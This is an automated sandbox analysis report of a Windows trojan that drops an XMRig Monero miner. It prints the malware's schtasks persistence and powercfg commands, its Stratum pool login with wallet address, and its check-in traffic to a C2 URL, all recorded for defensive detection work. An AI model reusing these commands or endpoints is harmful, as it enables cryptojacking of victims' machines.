Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ft1i6jvAdD.exe

Overview

General Information

Sample name:ft1i6jvAdD.exe
renamed because original name is a hash value
Original sample name:b03c2d7df7eabc44f36397cb66ac3e77.exe
Analysis ID:1411192
MD5:b03c2d7df7eabc44f36397cb66ac3e77
SHA1:486f521d16d96878a74ff9212cf2da5b184e0430
SHA256:4489ff33e7a91c7485a1c1dd8a6102868e385f74fd8b5dbdbf4b505bbe9193b3
Tags:64exetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Snort IDS alert for network traffic
Yara detected Xmrig cryptocurrency miner
DNS related to crypt mining pools
Detected Stratum mining protocol
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ft1i6jvAdD.exe (PID: 7032 cmdline: C:\Users\user\Desktop\ft1i6jvAdD.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 7132 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
      • powercfg.exe (PID: 6320 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6416 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6456 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6584 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 4112 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • cmd.exe (PID: 7160 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6172 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2656 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6216 cmdline: cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • fgfdgd.exe (PID: 6784 cmdline: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 6244 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
      • powercfg.exe (PID: 6480 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6748 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6740 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6560 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7160 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6292 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6456 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6344 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • fgfdgd.exe (PID: 3760 cmdline: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 1716 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
      • powercfg.exe (PID: 4076 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3184 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 1492 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 5108 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4940 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 692 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 412 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5568 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • fgfdgd.exe (PID: 1828 cmdline: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 6212 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
      • powercfg.exe (PID: 6404 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6512 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6612 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6364 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6360 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6460 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4000 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6548 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6316 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • fgfdgd.exe (PID: 1668 cmdline: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe MD5: B03C2D7DF7EABC44F36397CB66AC3E77)
    • ghghghg.exe (PID: 1800 cmdline: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" MD5: D3CD8232D7097DC4953B61B86AFD7FD2)
    • cmd.exe (PID: 1380 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 6 entries

              Sigma Signatures

              Change of critical system settings

              barindex
              Sigma detected: Disable power options
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ghghghg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ghghghg.exe, ParentProcessId: 7132, ParentProcessName: ghghghg.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6320, ProcessName: powercfg.exe

              System Summary

              barindex
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f, CommandLine: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6172, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f, ProcessId: 2656, ProcessName: schtasks.exe
              Sigma detected: Local Accounts Discovery
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd, CommandLine: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\ft1i6jvAdD.exe, ParentImage: C:\Users\user\Desktop\ft1i6jvAdD.exe, ParentProcessId: 7032, ParentProcessName: ft1i6jvAdD.exe, ProcessCommandLine: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd, ProcessId: 7160, ProcessName: cmd.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc, CommandLine: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc, ProcessId: 6316, ProcessName: svchost.exe

              Snort Signatures

              Timestamp:03/18/24-17:51:14.723704
              SID:2051004
              Source Port:49729
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-17:51:14.723704
              SID:2011341
              Source Port:49729
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-17:52:16.406978
              SID:2051004
              Source Port:49734
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-17:52:16.406978
              SID:2011341
              Source Port:49734
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-17:50:15.279061
              SID:2051004
              Source Port:49726
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/18/24-17:50:15.279061
              SID:2011341
              Source Port:49726
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeReversingLabs: Detection: 55%
              Multi AV Scanner detection for submitted file
              Source: ft1i6jvAdD.exeReversingLabs: Detection: 55%
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: ft1i6jvAdD.exeJoe Sandbox ML: detected

              Bitcoin Miner

              barindex
              Yara detected Xmrig cryptocurrency miner
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4112, type: MEMORYSTR
              DNS related to crypt mining pools
              Source: unknownDNS query: name: xmr-eu1.nanopool.org
              Detected Stratum mining protocol
              Source: global trafficTCP traffic: 192.168.2.12:49709 -> 162.19.224.121:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49pxa5cu5h8jnb4x6adm7vgfk4e8z11jb9ajxcfbc69wrzxfpjgnjfkfzltkm5w33fk3y1zyvjfjcedel5pdunzp1epmxhx","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
              Source: global trafficTCP traffic: 192.168.2.12:49730 -> 54.37.137.114:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49pxa5cu5h8jnb4x6adm7vgfk4e8z11jb9ajxcfbc69wrzxfpjgnjfkfzltkm5w33fk3y1zyvjfjcedel5pdunzp1epmxhx","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
              Source: ft1i6jvAdD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2051004 ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request 192.168.2.12:49726 -> 134.255.231.136:80
              Source: TrafficSnort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.12:49726 -> 134.255.231.136:80
              Source: TrafficSnort IDS: 2051004 ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request 192.168.2.12:49729 -> 134.255.231.136:80
              Source: TrafficSnort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.12:49729 -> 134.255.231.136:80
              Source: TrafficSnort IDS: 2051004 ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request 192.168.2.12:49734 -> 134.255.231.136:80
              Source: TrafficSnort IDS: 2011341 ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection 192.168.2.12:49734 -> 134.255.231.136:80
              Source: global trafficTCP traffic: 192.168.2.12:49709 -> 162.19.224.121:10300
              Source: global trafficTCP traffic: 192.168.2.12:49730 -> 54.37.137.114:10300
              Source: Joe Sandbox ViewASN Name: ACTIVE-SERVERSactive-serverscomDE ACTIVE-SERVERSactive-serverscomDE
              Source: Joe Sandbox ViewASN Name: CENTURYLINK-US-LEGACY-QWESTUS CENTURYLINK-US-LEGACY-QWESTUS
              Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownDNS traffic detected: queries for: xmr-eu1.nanopool.org
              Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 522Content-Type: application/jsonHost: cf-protected-l7.comUser-Agent: cpp-httplib/0.12.6
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.00000000013E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cf-protected-l7.com/api/endpoint.php
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cf-protected-l7.com/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=
              Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cf-protected-l7.com/api/endpoint.phpU
              Source: explorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cf-protected-l7.com/api/endpoint.phpe$U
              Source: explorer.exe, 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cf-protected-l7.com/api/endpoint.phptmsnnprpbvnfzokr
              Source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0

              System Summary

              barindex
              Uses powercfg.exe to modify the power settings
